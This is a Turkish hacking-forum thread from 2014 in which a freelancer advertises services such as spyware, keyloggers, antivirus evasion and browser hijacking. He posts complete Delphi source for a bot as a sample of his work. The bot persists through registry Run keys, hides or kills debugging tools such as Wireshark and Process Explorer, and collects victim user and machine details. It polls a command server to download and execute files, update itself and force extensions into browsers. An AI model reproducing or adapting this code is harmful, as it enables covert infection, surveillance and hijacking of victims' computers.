UzmanKirala.com üzerinden iş alımı yapıyorum.
38
●4.812
- 16-10-2014, 14:42:34Arkadaş işinde çok profesyoneldir ozellikle delphi ve mobil uygulamalar konusunda kendini aşmış
- 16-10-2014, 16:16:57Kendisi delphi canavarıdır. Aklınıza gelebilecek bütün uygulamarı stabil çalışacak şekilde yazdırabilirsiniz.
- 16-10-2014, 16:22:51Skype eklermisin dostum;musa_candir@hotmail.comtbtlb adlı üyeden alıntı: mesajı görüntülearkadaslar merhaba,
C/C++ Assembler ve Delphi dillerinde Masaüstü ve Mobil uygulamalar geliştiriyorum.
internetten veri çekme, soket tabanli multithreaded client/server uygulamalari, json/xml/text data/video/image/audio işleme, Tarayıcı İşlemleri (Ana Sayfa Değiştirme Programları, Eklenti Kurulumu Yapan Programlar), Undetecting, Spyware, KeyLogger ile ilgili işler yapiyorum..
referanslarim mevcut, PM araciligi ile talep edebilirsiniz.
dogrudan programlama(C/C++/ASM/Delphi/VisualBasic/VBScript/PHP/ASP) egitimi almak isteyenler, ilgilenenler,soru sormak isteyenler ve benimle calismak isteyenler PM atabilir.
Yazmış Olduğum Örnek Bir Kod Parçacığı...
program Join; //{$DEFINE DEBUG_MODE_ON} // Hata Duzeltmeleri İcin; bu satiri kapatirsan siyah ekran gider. //{$DEFINE DEMO_VERSION} {$IFDEF DEBUG_MODE_ON} {$APPTYPE CONSOLE} // Siyah Ekran Gozukmesi Icin Gereklidir. {$ELSE} {$APPTYPE GUI} // Siyah Ekrani Gizlemek İcin; {$ENDIF} {$IFDEF DEBUG_MODE_ON} {$E .dll} {$ELSE} {$E .dll} {$ENDIF} {$WARNINGS OFF} {$HINTS OFF} {$R Generator.RES} { [+] Eklenen Ozellik [*] Duzeltilen Sorun [-] Cikarilan Ozellik [#] Gelistirilen Ozellik Guncelleme - 30.07.2014 + Dosya İle Birleştirme Özelliği Eklendi. + Registry Key ve Installation Name değiştirebilme Özelliği Eklendi. + Builder Özelliği Eklendi + Simge Değiştirebilme Özelliği Eklendi. + UPX ike Sıkıştırma Özelliği Eklendi. Guncelleme - 15.07.2014 + CloudFlare Destegi Eklendi. * CloudFlare gibi protected sunuculardan dosya cekim isleminde hata verip programin kirilmasina sebep olan problem duzeltildi. + User-Agent Eklendi + Redirection Eklendi + WireShark Anti Debugger Bypass Ozelligi Eklendi * Programin hata vermesine sebebiyet veren (SaveToFile) Free edilemeyen MemoryStream sorunu duzeltildi. * SaveToFile Fonksiyonu WinAPI kullanilarak improve edildi. + Demo Version Destegi Eklendi. Eklenenler - 01.07.2014 + Chrome görev yöneticisi ekranını otomatik kapatabilme özelliği eklendi. * Paneldeki Sorun Düzeltildi. * Programin komut almamasına sebep olan problem düzeltildi. * Uygulama installation dizini tekrar düzeltildi. # Bazı fonksiyonlar geliştirildi. Bilgisayar bilgisi alan fonksiyon düzenlendi. Guncelleme - 03.07.2014 * Process Sonlandirmadaki Yetkilendirme Problemi Duzeltildi. * Installation Islemi Threadindaki Olusan Hata Duzeltildi. - Taskkill /im /f process* fonksiyonu programdan cikarildi. } uses Windows, IdHTTP, Classes, IniFiles, shFolder, Math, ShellAPI, TlHelp32, ImageHlp, ShlObj, SysUtils, uRC4 in 'uRC4.pas', uPrefs in 'uPrefs.pas'; const CMD_CLOSESERVER = 1000; CMD_UNINSTALLFILE = 1001; CMD_UPDATESERVER = 1002; CMD_INSTALLEXTENSION = 1003; CMD_RESETBROWSERS = 1004; CMD_DOWNLOADANDEXECUTE = 1005; const NONE = $00; //Blank number INET_USERAGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'; INET_REDIRECT_MAX = 10; Type TCustomDownloadFile = record SavePath : string; end; TBotConfig = record Mutex : String; VictimName : string; VictimComputerName : string; VictimCountry : string; VictimLanguage : string; VictimOS : string; VictimVersion : string; SettingsFile : string; SettingsIniFile : TIniFile; ProductKey : string; CommandURL : string; InstallDirectory, InstallName, InstallDirectoryPath, RegistryName : string; End; TInfo = RECORD URL_ADDR : ARRAY [0..255] OF CHAR; BINDER : BOOL; FILE_NAME : ARRAY [0..255] OF CHAR; // BROWSER FIREFOX : BOOL; OPERA : BOOL; CHROME : BOOL; EXPLORER : BOOL; SAFARI : BOOL; PALEMON : BOOL; MAXTHON : BOOL; KMELEON : BOOL; DRAGON : BOOL; AVANT : BOOL; YANDEX : BOOL; TORCH : BOOL; IRON : BOOL; CHROMIUM : BOOL; SUPERBIRD : BOOL; CHROMECANARY : BOOL; //OTHER MELT : BOOL; PERSISTANCE : BOOL; ENCRYPT : BOOL; INSTALL : BOOL; //REGISTRY KEY : ARRAY [0..255] OF CHAR; PROGRAMNAME : ARRAY [0..255] OF CHAR; END; TBrowser = record // Tarayici Bilgileri; Firefox_Path, Firefox_Config, Firefox_Ext, Chrome_Path, Chrome_Config, Chrome_Ext, Yandex_Path, Yandex_Config, Yandex_Ext, ComodoDragon_Path, ComodoDragon_Config, ComodoDragon_Ext, Torch_Path, Torch_Config, Torch_Ext, Maxthon_Path, Maxthon_Config, Maxthon_Ext, Iron_Path, Iron_Config, Iron_Ext, Chromium_Path, Chromium_Config, Chromium_Ext, SuperBird_Path, SuperBird_Config, SuperBird_Ext, ChromeCanary_Path, ChromeCanary_Config, ChromeCanary_Ext, Opera_Path, Opera_Config, Opera_Ext : string; // Yuklenmis mi? Firefox_Installed, Chrome_Installed, Yandex_Installed, ComodoDragon_Installed, Torch_Installed, Maxthon_Installed, Iron_Installed, SuperBird_Installed, ChromeCanary_Installed, Chromium_Installed, Opera_Installed : Boolean; End; Const Parser : String = '~'; CurrentVersion : string = '0.9.9.2'; StartUpPath : string = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\'; var BotConfig : TBotConfig; INFO : TInfo; Procedure DemoVersion; begin {$IFDEF DEMO_VERSION} MessageBox(0,'DEVAM_ICIN_ILERI_BAS','DEMO_VERSION',MB_OK OR MB_ICONINFORMATION); {$ENDIF} end; Procedure DebugPrompt(pszData : string); begin //OutputDebugStringW(PWideChar(WideString(pszData))); //Writeln(pszData); //Writeln(pszData); {$IFDEF DEBUG_MODE_ON} Writeln(pszData) {$ENDIF} end; function KillTask(ExeFileName: string): Integer; const PROCESS_TERMINATE = $0001; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin Result := 0; FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); FProcessEntry32.dwSize := SizeOf(FProcessEntry32); ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); while Integer(ContinueLoop) <> 0 do begin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then Result := Integer(TerminateProcess( OpenProcess(PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0)); ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; procedure DetectChromeTaskManager; var guiInfo : TGUIThreadInfo; WindowName : string; arrWindow : array[0..255] of char; begin while True Do begin guiInfo.cbsize := sizeof(TGUIThreadInfo); GetGUIThreadInfo(0,guiInfo); ZeroMemory(@arrWindow,SizeOf(arrWindow)); GetWindowText(guiInfo.hwndActive,arrWindow,sizeof(arrWindow)); WindowName := trim(string(arrWindow)); if ( (WindowName = 'Görev Yöneticisi - Google Chrome') or (WindowName = 'Task Manager - Google Chrome') or (WindowName = 'Task Manager - Comodo Dragon') or (WindowName = 'Görev Yöneticisi - Comodo Dragon') or (WindowName = 'Yandex görev yöneticisi') or (WindowName = 'Task Manager Yandex') or (WindowName = 'Task Manager - Iron') or (WindowName = 'Görev Yöneticisi - Iron') or (WindowName = 'Task Manager - Superbird') or (WindowName = 'Görev Yöneticisi - Superbird') or (WindowName = 'Görev Yöneticisi - Torch') or (WindowName = 'Task Manager - Torch') ) then begin DebugPrompt(WindowName + ' Tespit Edildi ve KAPANDI'); CloseWindow(guiInfo.hwndActive); end else if (WindowName = 'Fiddler Web Debugger') or // Kill Debuggers; (Pos('rocess Explorer',WindowName)>0) or (Pos('rocess Hacker',WindowName)>0) then begin EnableWindow(guiInfo.hwndActive,false); ShowWindow(guiInfo.hwndActive,SW_HIDE); end else if (Pos('Wireshark',WindowName)>0) then begin KillTask('Wireshark.exe'); end; Sleep(1000); end; end; procedure Str2File(sData,sPath: string); var hFile: THandle; dWritten: DWORD; begin DebugPrompt('KAYIT YERI : ' + sPath); hFile := CreateFile(PChar(sPath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if hFile <> 0 then begin SetFilePointer(hFile, 0, nil, FILE_BEGIN); WriteFile(hFile, sData[1], Length(sData), dWritten, nil); end; CloseHandle(hFile); DebugPrompt('KAYIT EDILDI!'); end; Function AddToRegistry(RegKey : HKey;dType : Cardinal;SubKey,SingleKey,Value : String) : Boolean; VAR Key : HKey; Begin Result := False; if RegOpenKeyEx(RegKey,PChar(SubKey), 0, KEY_WRITE, Key) = ERROR_SUCCESS then begin RegSetValueEx(Key, PAnsiChar(SingleKey), 0,dType, PChar(Value),Length(Value)); // The 1 is for the terminating 0 (PChar) RegCloseKey(Key); RegCloseKey(RegKey); end; End; function Url2File(data : string) : string; begin Result := StringReplace(data,'/','\',[rfReplaceAll]); end; function GetCustomPath(PathIndex : Integer) : string; var arrPath : array[0..255] of char; begin ZeroMemory(@arrPath,SizeOf(arrPath)); case PathIndex of 5 : begin GetTempPath(SizeOf(arrPath),@arrPath); end; // TEMP 6 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_APPDATA,false); end; // App DATA 7 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_LOCAL_APPDATA,false); end; // Local App DATA end; result := IncludeTrailingBackSlash(Trim(string(arrPath))); end; function GenerateRandomText(iLen : Integer): string; var i : Integer; begin Randomize; Result := ''; for i := 0 to iLen do begin Result := Result + Chr( RandomRange(65,90) ); end; end; function GetUserInfo(Index : Integer) : String; var arrData : array [0..255] of char; hSize : Cardinal; begin ZeroMemory(@arrData,SizeOf(arrData)); hSize := SizeOf(arrData); FillChar(arrData,SizeOf(arrData),#0); case Index of 0 : begin GetComputerName(arrData,hSize); end; // computername 1 : begin GetUserName(arrData,hSize); end; // username 2 : begin // country Info Windows.GetLocaleInfo(LOCALE_USER_DEFAULT,LOCALE_SISO3166CTRYNAME,arrData,SizeOf(arrData)) end; 3 : begin // language VerLanguageName(GetSystemDefaultLCID,arrData,SizeOf(arrData)); end; end; Result := string(Trim(string(arrData))); Result := StringReplace(Result,' ','_',[rfReplaceAll]); Result := StringReplace(Result,'.','_',[rfReplaceAll]); Result := StringReplace(Result,',','_',[rfReplaceAll]); Result := StringReplace(Result,'~','_',[rfReplaceAll]); Result := StringReplace(Result,'$','_',[rfReplaceAll]); Result := StringReplace(Result,'#','_',[rfReplaceAll]); Result := StringReplace(Result,'*','_',[rfReplaceAll]); Result := StringReplace(Result,'{','_',[rfReplaceAll]); Result := StringReplace(Result,'}','_',[rfReplaceAll]); Result := StringReplace(Result,'[','_',[rfReplaceAll]); Result := StringReplace(Result,']','_',[rfReplaceAll]); Result := StringReplace(Result,'(','_',[rfReplaceAll]); Result := StringReplace(Result,')','_',[rfReplaceAll]); Result := StringReplace(Result,'+','_',[rfReplaceAll]); Result := StringReplace(Result,'%','_',[rfReplaceAll]); Result := StringReplace(Result,'<','_',[rfReplaceAll]); Result := StringReplace(Result,'>','_',[rfReplaceAll]); Result := StringReplace(Result,'|','_',[rfReplaceAll]); Result := StringReplace(Result,'?','_',[rfReplaceAll]); Result := StringReplace(Result,'-','_',[rfReplaceAll]); if Length(Result) = 0 then Result := 'Unknown'; DebugPrompt('Info:'+IntToStr(Index)+ '---' +Result); end; function InternetDownloadFile(pszUrl : string;Execute: Boolean;HasParams : String):TCustomDownloadFile; var hDownloadSocket : TIdHTTP; stream : TMemoryStream; begin Result.SavePath := GetCustomPath(5) + ExtractFileName(Url2File(pszUrl)); If FileExists(Result.SavePath) then begin DeleteFileW(PWideChar(WideString(Result.SavePath))); end; DebugPrompt('URL ADRESİ : ' + pszUrl); stream := TMemoryStream.Create; hDownloadSocket := TIdHTTP.Create(nil); hDownloadSocket.request.userAgent := INET_USERAGENT; hDownloadSocket.redirectMaximum := INET_REDIRECT_MAX; hDownloadSocket.handleRedirects := INET_REDIRECT_MAX<>NONE; DebugPrompt('URL Adresi : ' + pszUrl); hDownloadSocket.Get(pszUrl,Stream); Stream.position := 0 ; If not FileExists(Result.SavePath) then begin Stream.SaveToFile(Result.SavePath); Stream.Free; end; if Execute = true then begin DebugPrompt(Result.SavePath); ShellExecuteA(0,'OPEN',PAnsiChar(Result.SavePath),PAnsiChar(HasParams),Nil,SW_SHOW); end; end; Procedure Melt(OldFile :String); var BatData : String; BatFile : String; Begin BatData :=':start'+#13#10+ 'ping -n 1 localhost'+#13#10+ 'del' + ' "' + OldFile + '"'+#13#10+ 'if exist' + ' "' + OldFile + '" ' + 'goto start'+ #13#10+ 'del %0'; BatFile:=IncludeTrailingBackSlash(GetCustomPath(5)) + 'Sil.bat'; Str2File(BatData,BatFile); ShellExecuteA(0, 'open', PAnsiChar(BatFile), nil, nil, SW_HIDE); End; procedure Uninstall; begin AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,''); AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,''); Melt(ParamStr(0)); ExitProcess(0); end; function StringToUnicode(sString:String):String; var i:integer; begin Result := ''; for i := 1 to Length(sString) do begin Result := Result + sString[i] + #0; end; end; procedure InstallFile; var pCurPath:Pointer; strPath : String; ServerMutex : THandle; begin AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath); AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath); strPath := BotConfig.InstallDirectoryPath; strPath := StringToUnicode(strPath); if lstrlenW(@strPath[1]) <> 0 then begin GetMem(pCurPath,(MAX_PATH * 4)); if pCurPath <> nil then begin GetModuleFileNameW(0,pCurPath,(MAX_PATH * 4)); if lstrcmpiW(pCurPath,@strPath[1]) <> 0 then begin if CopyFileW(pCurPath,@strPath[1],False) then begin if ShellExecuteW(0,nil,@strPath[1],nil,nil,SW_SHOW) >= 32 then begin ExitProcess(0); end; end; end; FreeMem(pCurPath); end; end; ServerMutex := CreateMutex(nil,False,pchar(String(BotConfig.Mutex))); if GetLastError = ERROR_ALREADY_EXISTS then begin CloseHandle(ServerMutex); ExitProcess(0); end; end; procedure OpenBrowser; begin if ShellExecuteW(0,nil,'Chrome.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Chrome Calisti'); end else if ShellExecuteW(0,nil,'Firefox.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('FireFox Calisti'); end else if ShellExecuteW(0,nil,'Browser.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Yandex Calisti'); end else if ShellExecuteW(0,nil,'Opera.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Opera Calisti'); end else if ShellExecuteW(0,nil,'Dragon.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Comodo Dragon Calisti'); end else if ShellExecuteW(0,nil,'iexplore.exe',nil,nil,SW_SHOW) >= 32 then begin DebugPrompt('Internet Explorer Calisti'); end else begin ShellExecuteA(0,'OPEN',PAnsiChar('http://facebook.com'),'',Nil,SW_SHOW); end; end; procedure ResetBrowsers; var strBrowserList : TStringList; i : Integer; begin strBrowserList := TStringList.Create; strBrowserList.Clear; // Tarayicilari Kapat with strBrowserList do begin Add('firefox.exe'); Add('chrome.exe'); Add('yandex.exe'); Add('iexplore.exe'); Add('browser.exe'); Add('dragon.exe'); Add('opera.exe'); Add('iron.exe'); Add('superbird.exe'); Add('torch.exe'); end; for i := 0 to strBrowserList.Count - 1 do begin DebugPrompt('Oldurulen Tarayici : ' + strBrowserList.Strings[i]); KillTask(strBrowserList.Strings[i]); end; end; function CheckExtensionIsInstalled(Url,Path : String) : Boolean; begin Result := False; if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastExtension','')<>Url then begin BotConfig.SettingsIniFile.WriteString('SETTINGS','LastExtension',Url); Result := False; end else begin DebugPrompt('Bu Eklenti Zaten Yüklenmiştir...'); Result := True; end; end; procedure InstallExtension(pszData : string); var Key,Value,ExtensionURL : string; Browser : TBrowser; ExtName : string; begin // Eklenti Kur ExtensionURL := Copy(pszData,1,Pos(Parser,pszData)-1); Delete(pszData,1,Length(ExtensionURL)+1); Key := Copy(pszData,1,Pos(Parser,pszData)-1); Delete(pszData,1,Length(Key)+1); Value := Copy(pszData,1,Pos(Parser,pszData)-1); if CheckExtensionIsInstalled(ExtensionURL,Browser.Chrome_Ext + ExtName) = True then begin Exit; end; DebugPrompt('ExtensionURL:'+ExtensionURL); DebugPrompt('Key:'+Key); DebugPrompt('Value:'+Value); Browser.Chrome_Path := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Extensions\'; Browser.Chrome_Config := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chrome_Path))); Browser.Chrome_Installed := FileExists(Browser.Chrome_Config); Browser.Chrome_Ext := IncludeTrailingBackSlash(Browser.Chrome_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Chrome_Ext)); DebugPrompt(Browser.Chrome_Ext); Browser.Yandex_Path := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Extensions\'; Browser.Yandex_Config := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Yandex_Path))); Browser.Yandex_Installed := FileExists(Browser.Yandex_Config); Browser.Yandex_Ext := IncludeTrailingBackSlash(Browser.Yandex_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Yandex_Ext)); DebugPrompt(Browser.Yandex_Ext); Browser.ComodoDragon_Path := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Extensions\'; Browser.ComodoDragon_Config := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ComodoDragon_Path))); Browser.ComodoDragon_Installed := FileExists(Browser.ComodoDragon_Config); Browser.ComodoDragon_Ext := IncludeTrailingBackSlash(Browser.ComodoDragon_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.ComodoDragon_Ext)); DebugPrompt(Browser.ComodoDragon_Ext); Browser.ChromeCanary_Path := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Extensions\'; Browser.ChromeCanary_Config := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ChromeCanary_Path))); Browser.ChromeCanary_Installed := FileExists(Browser.ChromeCanary_Config); Browser.ChromeCanary_Ext := IncludeTrailingBackSlash(Browser.ChromeCanary_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.ChromeCanary_Ext)); DebugPrompt(Browser.ChromeCanary_Ext); Browser.Chromium_Path := GetCustomPath(7) + 'Chromium\User Data\Default\Extensions\'; Browser.Chromium_Config := GetCustomPath(7) + 'Chromium\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chromium_Path))); Browser.Chromium_Installed := FileExists(Browser.Chromium_Config); Browser.Chromium_Ext := IncludeTrailingBackSlash(Browser.Chromium_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Chromium_Ext)); DebugPrompt(Browser.Chromium_Ext); Browser.Torch_Path := GetCustomPath(7) + 'Torch\User Data\Default\Extensions\'; Browser.Torch_Config := GetCustomPath(7) + 'Torch\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Torch_Path))); Browser.Torch_Installed := FileExists(Browser.Torch_Config); Browser.Torch_Ext := IncludeTrailingBackSlash(Browser.Torch_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Torch_Ext)); DebugPrompt(Browser.Torch_Ext); Browser.SuperBird_Path := GetCustomPath(7) + 'SuperBird\User Data\Default\Extensions\'; Browser.SuperBird_Config := GetCustomPath(7) + 'SuperBird\User Data\Default\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.SuperBird_Path))); Browser.SuperBird_Installed := FileExists(Browser.SuperBird_Config); Browser.SuperBird_Ext := IncludeTrailingBackSlash(Browser.SuperBird_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.SuperBird_Ext)); DebugPrompt(Browser.SuperBird_Ext); Browser.Opera_Path := GetCustomPath(6) + 'Opera Software\Opera Stable\Extensions\'; Browser.Opera_Config := GetCustomPath(6) + 'Opera Software\Opera Stable\Preferences'; MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Opera_Path))); Browser.Opera_Installed := FileExists(Browser.Opera_Config); Browser.Opera_Ext := IncludeTrailingBackSlash(Browser.Opera_Path + Key); MakeSureDirectoryPathExists(PAnsiChar(Browser.Opera_Ext)); DebugPrompt(Browser.Opera_Ext); with InternetDownloadFile(ExtensionURL,false,'') do begin ExtName := ExtractFileName(SavePath); DebugPrompt(#13#10#13#10); DebugPrompt('YAZILACAK YER : ' + Browser.Chrome_Ext + ExtName); DebugPrompt('NEREDEN : ' + SavePath); DebugPrompt('Browserlar Resetleniyor..'); ResetBrowsers; DebugPrompt('Browserlar Resetlendi.'); Sleep(5000); DebugPrompt('Chrome_Ext : ' + Browser.Chrome_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chrome_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Chrome_Ext + ExtName), Browser.Chrome_Config); DebugPrompt('Yandex_Ext : ' + Browser.Yandex_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Yandex_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Yandex_Ext + ExtName), Browser.Yandex_Config); DebugPrompt('ComodoDragon_Ext : ' + Browser.ComodoDragon_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ComodoDragon_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.ComodoDragon_Ext + ExtName), Browser.ComodoDragon_Config); DebugPrompt('Torch_Ext : ' + Browser.Torch_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Torch_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Torch_Ext + ExtName), Browser.Torch_Config); DebugPrompt('Opera_Ext : ' + Browser.Opera_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Opera_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Opera_Ext + ExtName), Browser.Opera_Config); DebugPrompt('ChromeCanary_Ext : ' + Browser.ChromeCanary_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.ChromeCanary_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.ChromeCanary_Ext + ExtName), Browser.ChromeCanary_Config); DebugPrompt('Chromium_Ext : ' + Browser.Chromium_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.Chromium_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.Chromium_Ext + ExtName), Browser.Chromium_Config); DebugPrompt('SuperBird_Ext : ' + Browser.SuperBird_Ext + ExtName); CopyFile(PansiChar(SavePath),PAnsiChar(Browser.SuperBird_Ext + ExtName),False); Str2File(GenerateChromePreferences(Value,Key,Browser.SuperBird_Ext + ExtName), Browser.SuperBird_Config); DebugPrompt('Tarayici Calistiriliyor..'); OpenBrowser; DebugPrompt('Tarayici Calistirildi.'); Exit; end; end; procedure UpdateServer(pszNewFile : string); begin // Server Guncelle with InternetDownloadFile(pszNewFile,True,'') do begin ExitProcess(0); end; end; procedure CheckCommands(Data : string); var CommandID : Integer; Params : String; IsCommandApplied : Boolean; begin Data := Trim(Data); Delete(Data,1,Pos(':',Data)); IsCommandApplied := False; if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastCommandHash','')<>Data then begin BotConfig.SettingsIniFile.WriteString('SETTINGS','LastCommandHash',Data); IsCommandApplied := True; end; if IsCommandApplied = false then begin DebugPrompt('Bu Komut Daha Önceden Zaten Uygulanmış'); Exit; end; Data := HexToStr(Trim(Data)); CommandID := StrToIntDef(Copy(Data,1,Pos(Parser,Data)-1),0); Delete(Data,1,Length(IntToStr(CommandID))+1); case CommandID of CMD_CLOSESERVER : begin ExitProcess(0); end; CMD_UNINSTALLFILE : begin Uninstall; end; CMD_UPDATESERVER : begin DebugPrompt(Data); UpdateServer(Data); end; CMD_RESETBROWSERS : begin ResetBrowsers; OpenBrowser; end; CMD_INSTALLEXTENSION : begin InstallExtension(Data); end; CMD_DOWNLOADANDEXECUTE : begin InternetDownloadFile(Data,True,''); end; end; end; function Decrypt(St: string): string; var i: integer; a: byte; begin Result := ''; for i := length(St) downto 1 do begin A := ord(St[i]); result := result + char(a+1); end; end; procedure ReadCommands; var Socket: TIdHTTP; lstParams : TStringList; strResponse : string; begin lstParams := TStringList.Create; lstParams.Clear; lstParams.add('vKey='+BotConfig.ProductKey); lstParams.add('uID='+BotConfig.VictimName); lstParams.add('cID='+BotConfig.VictimComputerName); lstParams.add('vCountry='+BotConfig.VictimCountry); lstParams.add('vLang='+BotConfig.VictimLanguage); lstParams.add('vVer='+BotConfig.VictimVersion); lstParams.add('vOS='+BotConfig.VictimOS); while True do begin try Socket:= TIdHTTP.Create(nil); Socket.request.userAgent:= INET_USERAGENT; Socket.redirectMaximum := INET_REDIRECT_MAX; Socket.handleRedirects := INET_REDIRECT_MAX<>NONE; Socket.Port := 80; strResponse := Socket.Post(BotConfig.CommandURL,lstParams); except on e : Exception do begin DebugPrompt(E.Message); end; end; DebugPrompt('KOMUT OKUNDU:'+strResponse); CheckCommands(strResponse); strResponse:=''; Sleep(10000); end; end; var Msg : TMSG; ServerMutex, threadTaskManager, threadChromeTaskManagerControl, threadReadCommands, threadInstallServer : THandle; ResData : String; ResourceStream : TResourceStream; Stream : TMemoryStream; FileData : String; BindFilePath : String; threadTaskManagerId, threadInstallServerId, lpReadCommandThreadId : cardinal; begin DemoVersion; SetErrorMode(SEM_FAILCRITICALERRORS + SEM_NOALIGNMENTFAULTEXCEPT + SEM_NOGPFAULTERRORBOX + SEM_NOOPENFILEERRORBOX); DemoVersion; ResData:=''; ResourceStream:=TResourceStream.Create(0,'TKEY',RT_RCDATA); ResourceStream.Position:=0; SetString(ResData,pansichar(ResourceStream.Memory),ResourceStream.Size); ResData := Decrypt(ResData); DebugPrompt('DECRYPTED RES DATA : ' + ResData); Stream := TMemoryStream.Create; Stream.Write(pointer(ResData)^,Length(ResData)); Stream.Position := 0; Stream.Read(Info,SizeOf(TInfo)); FileData:=''; try ResourceStream:=TResourceStream.Create(0,'TFILE',RT_RCDATA); SetString(FileData,pansichar(ResourceStream.Memory),ResourceStream.Size); except on e : Exception do begin OutputDebugStringA(PAnsiChar(e.Message)); end; end; FileData := Decrypt(FileData); BotConfig.ProductKey := 'DENEMETEST'; BotConfig.Mutex := 'DENEMETESTv10'; BotConfig.VictimName := GetUserInfo(1); BotConfig.VictimComputerName := GetUserInfo(0); BotConfig.VictimCountry := GetUserInfo(2); BotConfig.VictimLanguage := GetUserInfo(3); BotConfig.InstallName := String(INFO.PROGRAMNAME); BotConfig.RegistryName := String(INFO.KEY); BotConfig.CommandURL := String(INFO.URL_ADDR); DemoVersion; BotConfig.SettingsFile := GetCustomPath(7) + BotConfig.VictimCountry + '_' + BotConfig.VictimName + '\' + BotConfig.VictimComputerName + '\' + BotConfig.VictimCountry + '\DENEMETEST.ini' ; MakeSureDirectoryPathExists(PAnsiChar(IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile)))); DebugPrompt(BotConfig.SettingsFile); DemoVersion; {$IFDEF DEBUG_MODE_ON} DeleteFileA(PAnsiChar(BotConfig.SettingsFile)); {$ENDIF} DemoVersion; BotConfig.SettingsIniFile := TIniFile.Create(BotConfig.SettingsFile); BotConfig.InstallDirectory := IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile)); BotConfig.InstallDirectoryPath := BotConfig.InstallDirectory + BotConfig.InstallName; DemoVersion; DemoVersion; {$IFNDEF DEBUG_MODE_ON} if INFO.INSTALL=True then begin InstallFile; end; {$ENDIF} DemoVersion; threadReadCommands := CreateThread(Nil,0,@ReadCommands,nil,0,lpReadCommandThreadId); threadTaskManager := CreateThread(nil,0,@DetectChromeTaskManager,nil,0,threadChromeTaskManagerControl); BindFilePath := BotConfig.InstallDirectory + INFO.FILE_NAME; DebugPrompt('Bindirilen Dosya : ' + BindFilePath); if Info.BINDER=TRUE then begin if not FileExists(BindFilePath) then begin DebugPrompt('Bindirilen Dosya Calıştırılıyor...'); Str2File(FileData,BindFilePath); ShellExecuteA(0,'OPEN',PAnsiChar(BindFilePath),'',NIL,SW_SHOW); DebugPrompt('Bindirilen Dosya Calistirildi'); end; end; While GetMessage(Msg,0,0,0) Do begin TranslateMessage(Msg); DispatchMessage(Msg); end; end.
iPhone 5 cihazimdan Tapatalk kullanilarak yazıldı.
Beğeniler
Değerlendirmeler